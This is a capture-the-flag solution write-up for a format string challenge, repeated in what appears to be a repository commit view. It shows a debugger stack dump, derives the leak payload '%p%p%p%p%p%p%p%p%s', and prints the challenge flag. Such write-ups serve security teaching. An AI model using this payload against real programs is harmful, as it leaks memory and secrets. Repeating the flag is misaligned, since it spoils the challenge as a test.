write-ups-challenges-2024-2025/tic-tac-toes/SOLUTION.md

## Difficulty
50/100 | MEDIUM

Simple format string attack, this is not groundbreaking stuff.

## Category
Exploitation
## How To Solve
There is a format string vulnerability in the `print_win_message` function. 
The name the user inputs at the beginning of the game is printed here using
`printf` without any validation. This means we can leak data from the stack.
It also happens that the flag is on the stack. 
To leak the flag we are going to use the `%s` format string specifier. The 
problem is that there are a couple of values on the stack before that, for
example the stack looks like this right before the `printf` call:

```
00:0000│ rsp 0x7fffffffd250 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
01:0008│-018 0x7fffffffd258 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
02:0010│-010 0x7fffffffd260 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
03:0018│-008 0x7fffffffd268 —▸ 0x55555555667f ◂— 'IGCTF{REDACTED}'
04:0020│ rbp 0x7fffffffd270 —▸ 0x7fffffffd2b0 —▸ 0x7fffffffd2e0 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3e0 ◂— ...
05:0028│+008 0x7fffffffd278 —▸ 0x555555555b64 (play_game+240) ◂— mov rax, qword ptr [rbp - 0x18]
06:0030│+010 0x7fffffffd280 —▸ 0x555555559740 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
07:0038│+018 0x7fffffffd288 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
```

So we need to pop off, 3 64 bit ints before we reach the flag. Which means we would
need the following payload `%p%p%p%s`. This would work on a 32 bit machine but since
this is a 64 bit binary, the first 6 arguments are passed via register. This means
we need to "pop off" an additional 5 arguments (the first argument is the format 
string itself) giving us the final payload string:
`%p%p%p%p%p%p%p%p%s`

## Flag
IGCTF{W3ll_y0u_st1ll_l0st_BuT_at_l3ast_yoU_g0t_th3_fl4g}
feat: add tic-tac-toes challenge 2024-11-25 21:33:42 +00:00			`## Difficulty`
			`50/100 \| MEDIUM`

			`Simple format string attack, this is not groundbreaking stuff.`

			`## Category`
			`Exploitation`
			`## How To Solve`
			There is a format string vulnerability in the `print_win_message` function.
			`The name the user inputs at the beginning of the game is printed here using`
			`printf` without any validation. This means we can leak data from the stack.
			`It also happens that the flag is on the stack.`
			To leak the flag we are going to use the `%s` format string specifier. The
			`problem is that there are a couple of values on the stack before that, for`
			example the stack looks like this right before the `printf` call:

			```
			`00:0000│ rsp 0x7fffffffd250 —▸ 0x5555555596b0 ◂— '%x%x%x%s'`
			`01:0008│-018 0x7fffffffd258 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'`
			`02:0010│-010 0x7fffffffd260 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'`
			`03:0018│-008 0x7fffffffd268 —▸ 0x55555555667f ◂— 'IGCTF{REDACTED}'`
			`04:0020│ rbp 0x7fffffffd270 —▸ 0x7fffffffd2b0 —▸ 0x7fffffffd2e0 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3e0 ◂— ...`
			`05:0028│+008 0x7fffffffd278 —▸ 0x555555555b64 (play_game+240) ◂— mov rax, qword ptr [rbp - 0x18]`
			`06:0030│+010 0x7fffffffd280 —▸ 0x555555559740 —▸ 0x5555555596b0 ◂— '%x%x%x%s'`
			`07:0038│+018 0x7fffffffd288 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'`
			```

			`So we need to pop off, 3 64 bit ints before we reach the flag. Which means we would`
			need the following payload `%p%p%p%s`. This would work on a 32 bit machine but since
			`this is a 64 bit binary, the first 6 arguments are passed via register. This means`
			`we need to "pop off" an additional 5 arguments (the first argument is the format`
			`string itself) giving us the final payload string:`
			`%p%p%p%p%p%p%p%p%s`

			`## Flag`
			`IGCTF{W3ll_y0u_st1ll_l0st_BuT_at_l3ast_yoU_g0t_th3_fl4g}`